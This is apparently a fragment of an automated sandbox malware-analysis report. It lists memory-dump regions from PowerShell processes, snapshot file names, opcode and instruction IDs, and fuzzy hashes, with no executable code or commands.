              • Opcode Fuzzy Hash: a715bb7dfb1534531b462678ce5f7ddcc5a4d4d4662531cd43a9d7830fe8cc4b
              • Instruction Fuzzy Hash: 48E15A31B1EB8E5FEBA5DBA888745B47BE1EF55320F1901BAD85DC71E3CE18A8058301
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32f4a866f57e051ab5541c2ca7c4d84cff7ff61d37d6b74861e75258b1abb45c
              • Instruction ID: 20b096bd296b4afa89ddc18ee23fcc004b38d7ff682ece110f8d6703459d62ac
              • Opcode Fuzzy Hash: 32f4a866f57e051ab5541c2ca7c4d84cff7ff61d37d6b74861e75258b1abb45c
              • Instruction Fuzzy Hash: C8D15622B1FA8E1FEBA69BAC58645B47BD1EF55210B0900FBD85CC71E3DD58AE05C342
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff79e0aacc16f4ba62618216db0159cd6dad5822b379b3d6c7f6dc1f95629814
              • Instruction ID: 49d182f8f928b4374b34cd6bfbe3d6aad9c16daaac8990660d497ac4d57be3e3
              • Opcode Fuzzy Hash: ff79e0aacc16f4ba62618216db0159cd6dad5822b379b3d6c7f6dc1f95629814
              • Instruction Fuzzy Hash: 5A61C730608B4D8FDBA8DF28D8557E977E1FF98310F00426EE85DC7295CB3899458B82
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48200bc1c8f0e7d9b37304d73aafe6a3e66f9560974a53956e324e3c5b51c75e
              • Instruction ID: d186779f90ab726fad6179717771f223d42ee439f7fe210b36fd8870e7a7ef74
              • Opcode Fuzzy Hash: 48200bc1c8f0e7d9b37304d73aafe6a3e66f9560974a53956e324e3c5b51c75e
              • Instruction Fuzzy Hash: 3D411522B6FACA1FE7A5D7A854705B867D1EF55320B1900BAD96CC72E3DE19AC048301
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 65557f9ed69c0ccf0770600277301b00ef7eecf6c443e0520f2a3acbbccbfce1
              • Instruction ID: 29d3f68a3cb877b385ed79dd7643a1dc062d344ef7164f3f542c3d5d61a9aeeb
              • Opcode Fuzzy Hash: 65557f9ed69c0ccf0770600277301b00ef7eecf6c443e0520f2a3acbbccbfce1
              • Instruction Fuzzy Hash: 1D31E522F6FADA1BE7B697E818B15B86781EF50354B1901BAD95DC31E3DD4C6E008342
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ecf7152bfeced514bb755f982f8ba397fc8d54ecd097a8e2a86dafadc306109
              • Instruction ID: 0c7b349e9872953938260dd3441ca79921a2b9ad243a50174e259784d725549c
              • Opcode Fuzzy Hash: 1ecf7152bfeced514bb755f982f8ba397fc8d54ecd097a8e2a86dafadc306109
              • Instruction Fuzzy Hash: 89312A30518B8C8FEBA9DF28C855BD97BE1FB98310F14426EE84DC7255CB78A545CB81
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3001959b665709d3ae1ef23cb84911a791e456f7cd23c21257915d77ddb64c55
              • Instruction ID: 218d7cb58e0795eab0b93d732922e7380cc1fd602800bac02ad9bd01b2332ff3
              • Opcode Fuzzy Hash: 3001959b665709d3ae1ef23cb84911a791e456f7cd23c21257915d77ddb64c55
              • Instruction Fuzzy Hash: F4311C70518B8C8FDBA8DF18C895BD97BE1FF98310F54426AE84DC7256CB74A544CB81
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
              • Instruction ID: 1fa9c4b6de25af3c09eeda563ddac642f27ce745a1e9786955744c945ca2b0d9
              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
              • Instruction Fuzzy Hash: 2A01A77020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1DA32E881CB41
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e544bf6ebdd3a3b75838c6c8c18c4a9258ef582b7de1fc147d500f8df482a2a
              • Instruction ID: aff458c76caf03ff04bf06a3aa47a0b5c7ff68d31b657ad7d6d6770870ee9a26
              • Opcode Fuzzy Hash: 2e544bf6ebdd3a3b75838c6c8c18c4a9258ef582b7de1fc147d500f8df482a2a
              • Instruction Fuzzy Hash: 2BB15270E00209DFDF24CFA9D9857ADBBF2AF88314F14C52DD815A7294EB74A985CB81
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88fc7db1312753aba3547d5da9ba8bad6ec2e1558b3b4a3bc94475a011605d49
              • Instruction ID: 693b2db50f17b85e2f6d0aec8f605ced7d753f7e1e9b94d2a25f7b3df5062daf
              • Opcode Fuzzy Hash: 88fc7db1312753aba3547d5da9ba8bad6ec2e1558b3b4a3bc94475a011605d49
              • Instruction Fuzzy Hash: 50B14D70E00209CFDF24CFA9D89579DBBF2AF88354F14C52DD815A7294EBB4A985CB81
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$tP^q$tP^q
              • API String ID: 0-3859475322
              • Opcode ID: 01963d39a7bbb23bb66d56cfb158280723b722718c5a6bb58c2ad6769ca40b69
              • Instruction ID: 4d614bda2e5203a5bef93d84a907038c4f42cd399a0f2ff299d3e1df9cd0e91a
              • Opcode Fuzzy Hash: 01963d39a7bbb23bb66d56cfb158280723b722718c5a6bb58c2ad6769ca40b69
              • Instruction Fuzzy Hash: D18126B0B402059FCB149F6DC804B7ABBE6AF85318F54C4AAE8059F391DB71DC45CBA1
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q$$^q
              • API String ID: 0-2125118731
              • Opcode ID: f30ee11be26e878d74305158209f7ac1c29d0dd885e296518bee9f3f4fde27b3
              • Instruction ID: 20f48f512673dae23f138bc82dedd1e3a9d0736d6729b17d24e223c62073f1fa
              • Opcode Fuzzy Hash: f30ee11be26e878d74305158209f7ac1c29d0dd885e296518bee9f3f4fde27b3
              • Instruction Fuzzy Hash: A12149B17143069BD7281B6A9D48B27BBDA7BC1719F24C83AA905CF385CDB5CC4082A1
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q$$^q
              • API String ID: 0-2049395529
              • Opcode ID: d5be9909ae398b1c6395ef780f9c0597e24eaacb00e945c45e2129a8b8ff1a51
              • Instruction ID: 9a8ecc963c5ee5c964c39a6d1aab4bacd5471845d678287a4fe985ecf3f4adce
              • Opcode Fuzzy Hash: d5be9909ae398b1c6395ef780f9c0597e24eaacb00e945c45e2129a8b8ff1a51
              • Instruction Fuzzy Hash: 8F0126A2B8D3C98FC72A16281824159AFB21F9394071A44CBC061CF79BCE548C49C767